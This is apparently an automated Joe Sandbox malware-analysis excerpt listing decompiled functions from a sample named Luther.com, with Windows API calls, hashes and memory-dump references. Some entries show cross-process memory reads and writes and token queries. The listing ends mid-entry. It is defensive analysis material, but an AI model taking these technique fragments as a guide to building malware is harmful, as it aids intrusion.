                                                                                                          • String ID:
                                                                                                          • API String ID: 2833360925-0
                                                                                                          • Opcode ID: 385b460d1b04d2b2dcd5360e35cf783e2db913be8ef1ec3d8360d5ef2fb9568a
                                                                                                          • Instruction ID: 28c407548266ff6335886a44f619edc925a66866679c77ed92ad26577c6a80af
                                                                                                          • Opcode Fuzzy Hash: 385b460d1b04d2b2dcd5360e35cf783e2db913be8ef1ec3d8360d5ef2fb9568a
                                                                                                          • Instruction Fuzzy Hash: 450157B1D05619EBCF00EFA5EC49AEEBB78FB08710F051466E501F2290DB369558C7A1
                                                                                                          APIs
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91A60
                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A6C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A7B
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A82
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E91A99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 842720411-0
                                                                                                          • Opcode ID: f237f28eb68a818f39340cac7177faef579388ea879c05689015f9f9037a0bda
                                                                                                          • Instruction ID: b93ade463309f49d687ec6dbfbf784ff8ad85863af1063871f267745dbfd5f5d
                                                                                                          • Opcode Fuzzy Hash: f237f28eb68a818f39340cac7177faef579388ea879c05689015f9f9037a0bda
                                                                                                          • Instruction Fuzzy Hash: 1F0181B5601606BFDF114F66DC48E6A3B6EEF84364B210474F845E3360DA72DC41CA60
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E91976
                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E91982
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91991
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91998
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E919AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 4e24538542a105b5bdf937ed9919c718a76eeaeffb3000fa52a2bf6d5c93c00f
                                                                                                          • Instruction ID: 4fc1e6f2c8b00c9f0ac3b0f7bd1c8b8a00b0facb8fe985ccf8a8798e116ce0eb
                                                                                                          • Opcode Fuzzy Hash: 4e24538542a105b5bdf937ed9919c718a76eeaeffb3000fa52a2bf6d5c93c00f
                                                                                                          • Instruction Fuzzy Hash: 64F06275144301AFDB214F6AEC59F5A3B6DEFC97A0F110434FD45E7250CA72D8068A60
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E91916
                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E91922
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E91931
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E91938
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E9194E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 578a58294ca93bee5f06a05295ab8e2e835dc08b3dcfd078532d43fd60def2c5
                                                                                                          • Instruction ID: a6991a7d0a0a8ec6657c92a5247673b50fc953d719ce63a855eebdc175c5bf4a
                                                                                                          • Opcode Fuzzy Hash: 578a58294ca93bee5f06a05295ab8e2e835dc08b3dcfd078532d43fd60def2c5
                                                                                                          • Instruction Fuzzy Hash: D6F04F75104302AFDB210F6A9C49F5A3B6DEF897A0F510434FE45E7250CA72DC068A60
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CCB
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CD8
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CE5
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CF2
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CFF
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0D0C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
                                                                                                          • Opcode ID: 09092c28a7b8cbadf004a5a63a2c7405c537e88697447a7fe000b1d64df8a0ef
                                                                                                          • Instruction ID: ba15cc31bcb93f8c44f6088341eb5cc16e760ec84fac8aa98aabe4b92f3b2d8e
                                                                                                          • Opcode Fuzzy Hash: 09092c28a7b8cbadf004a5a63a2c7405c537e88697447a7fe000b1d64df8a0ef
                                                                                                          • Instruction Fuzzy Hash: 02019072800B159FCB30AF66D980816FAF5BF513193159A3ED19662921C7B1B949DE80
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00E965BF
                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E965D6
                                                                                                          • MessageBeep.USER32(00000000), ref: 00E965EE
                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00E9660A
                                                                                                          • EndDialog.USER32(?,00000001), ref: 00E96624
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 27f39ee63ca71a8527b54eb8bcb2fa109f94325e92f9cfa320c79978ab5f3905
                                                                                                          • Instruction ID: dab9c86f89c7c1a4f1d7eeeba8cff91fe097e1a825ef3cb9cb11c0f5202a7678
                                                                                                          • Opcode Fuzzy Hash: 27f39ee63ca71a8527b54eb8bcb2fa109f94325e92f9cfa320c79978ab5f3905
                                                                                                          • Instruction Fuzzy Hash: 52016230504704ABEF205B11DE4EF967BB8BB00705F01157AB187B10E1DBF2AA89CA50
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00E6DAD2
                                                                                                            • Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
                                                                                                            • Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60
                                                                                                          • _free.LIBCMT ref: 00E6DAE4
                                                                                                          • _free.LIBCMT ref: 00E6DAF6
                                                                                                          • _free.LIBCMT ref: 00E6DB08
                                                                                                          • _free.LIBCMT ref: 00E6DB1A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: c40d13b34b078e639ad82be374e61420cdbe2df6eb9e8fe653a66c5e99231fe7
                                                                                                          • Instruction ID: 1136fd3dda35b1ef1bc7364d8a67d5affebf6a0c8b7dd146ce31c88818e5ceee
                                                                                                          • Opcode Fuzzy Hash: c40d13b34b078e639ad82be374e61420cdbe2df6eb9e8fe653a66c5e99231fe7
                                                                                                          • Instruction Fuzzy Hash: 23F0FF32A8C604ABC624EB99FD81D2A77EEAF557D47956C09F109F7501CA70FC80C654
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00E6262E
                                                                                                            • Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
                                                                                                            • Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60
                                                                                                          • _free.LIBCMT ref: 00E62640
                                                                                                          • _free.LIBCMT ref: 00E62653
                                                                                                          • _free.LIBCMT ref: 00E62664
                                                                                                          • _free.LIBCMT ref: 00E62675
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 8436f991ffefc5e9128354f47a4d49b69664cac995746e951fe7f60e74759ee2
                                                                                                          • Instruction ID: 3dbf6423c44c8241c0af4c7b24785f0c1507baff861c8927b700849fce39df88
                                                                                                          • Opcode Fuzzy Hash: 8436f991ffefc5e9128354f47a4d49b69664cac995746e951fe7f60e74759ee2
                                                                                                          • Instruction Fuzzy Hash: 72F03A709859298BCA42AF94FC018593BEABB757D2301A94FF510F2275CB300901BFD5
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$_free
                                                                                                          • String ID: a/p$am/pm
                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                          • Opcode ID: c3fa42546d2495bf8a1ec80598439b185d11bbe794d6b3b89adef6aa59bfd3cf
                                                                                                          • Instruction ID: 1339068c96ba57d424913f83697798aed43668cce1314a56550477ea8b7d91d5
                                                                                                          • Opcode Fuzzy Hash: c3fa42546d2495bf8a1ec80598439b185d11bbe794d6b3b89adef6aa59bfd3cf
                                                                                                          • Instruction Fuzzy Hash: BBD124759842068ACB268F68E8457FEB7B1FF01384F2C61DAE912BB250D7719D40CB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4229
                                                                                                            • Part of subcall function 00EA41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4239
                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00EB5419
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB550E
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB55CD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                          • String ID: bn
                                                                                                          • API String ID: 2854431205-2317007323
                                                                                                          • Opcode ID: 43eb61518da1c05512bfc4c4850cb161ef9dff3c34a240076e5aa9cd0f66f2a1
                                                                                                          • Instruction ID: ef00479cd55136ddbc7f80fd10ccd38ad87884214969d2ef7c76f5cf50c244fb
                                                                                                          • Opcode Fuzzy Hash: 43eb61518da1c05512bfc4c4850cb161ef9dff3c34a240076e5aa9cd0f66f2a1
                                                                                                          • Instruction Fuzzy Hash: 88D127B19006499FCB14DF94C895BEEBBB4FF08304F54906DE416BB292DB71AA86CF50
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                          • String ID: CALLARGARRAY$bn
                                                                                                          • API String ID: 157775604-1875210186
                                                                                                          • Opcode ID: 04a9caff4b8603ec9ee265a8ac5b980c34ca27a175563be3dd3680c9127d6f1a
                                                                                                          • Instruction ID: acface37cd02af96642e366834bfa5e2e9b2cbc2e034ee45cd04f7e9a8439448
                                                                                                          • Opcode Fuzzy Hash: 04a9caff4b8603ec9ee265a8ac5b980c34ca27a175563be3dd3680c9127d6f1a
                                                                                                          • Instruction Fuzzy Hash: 2541BE71A002099FDF04DFA8C8869EEBBF5FF58364F106069E506B7261E7759D81CB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E92B1D,?,?,00000034,00000800,?,00000034), ref: 00E9BDF4
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E930AD
                                                                                                            • Part of subcall function 00E9BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E92B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E9BDBF
                                                                                                            • Part of subcall function 00E9BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E9BD1C
                                                                                                            • Part of subcall function 00E9BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E92AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E9BD2C
                                                                                                            • Part of subcall function 00E9BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E92AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E9BD42
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9311A
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E93167
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: f3593b842c12067dbab9dbd66f612720bd91fee916069221ccdd70bb2c8843fb
                                                                                                          • Instruction ID: 318bcc0b2f6967c3ee012c4e9fd5f583130efe6ea63cbd12f1facddea31ab698
                                                                                                          • Opcode Fuzzy Hash: f3593b842c12067dbab9dbd66f612720bd91fee916069221ccdd70bb2c8843fb
                                                                                                          • Instruction Fuzzy Hash: CF413772901218BEDF11DBA4CD85EEEBBB8EF49304F0050A5FA45B7190DA716F89CB60
                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\224553\Luther.com,00000104), ref: 00E61AD9
                                                                                                          • _free.LIBCMT ref: 00E61BA4
                                                                                                          • _free.LIBCMT ref: 00E61BAE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$FileModuleName
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                          • API String ID: 2506810119-3678037166
                                                                                                          • Opcode ID: 8d24c12ad8b79f6083010a58e670a82f90e328e249f0732850b57ed4f89a9435
                                                                                                          • Instruction ID: 37524cc532ccf0a8ea5dfee815125657ff26d190076fdd59d6ae9dfa09833388
                                                                                                          • Opcode Fuzzy Hash: 8d24c12ad8b79f6083010a58e670a82f90e328e249f0732850b57ed4f89a9435
                                                                                                          • Instruction Fuzzy Hash: 32317571A80218EFDB22DF99EC85D9EBBFCEB85794B1451E6E804A7211E6704E40D790
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E9CBB1
                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00E9CBF7
                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F029C0,01085C68), ref: 00E9CC40
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 135850232-4108050209
                                                                                                          • Opcode ID: 3f8d02b236fee66fa6e7410d1f5e8bda646fb02db84b9f5cd2fefe80c41ea125
                                                                                                          • Instruction ID: b3a9dde4a9de315b105d46c8427424865b61b7381a01923bb1e71e582d2f35cc
                                                                                                          • Opcode Fuzzy Hash: 3f8d02b236fee66fa6e7410d1f5e8bda646fb02db84b9f5cd2fefe80c41ea125
                                                                                                          • Instruction Fuzzy Hash: AD41B3712043029FDB20EF24D985F5ABBE4AF89718F244A2DF9A5A7291D731E904CB52
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ECDCD0,00000000,?,?,?,?), ref: 00EC4F48
                                                                                                          • GetWindowLongW.USER32 ref: 00EC4F65
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC4F75
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID: SysTreeView32
                                                                                                          • API String ID: 847901565-1698111956
                                                                                                          • Opcode ID: cdeef67b0d49121771e79254606a5fc16c3ac48a48c92991c8c9ddd224bd6f0c
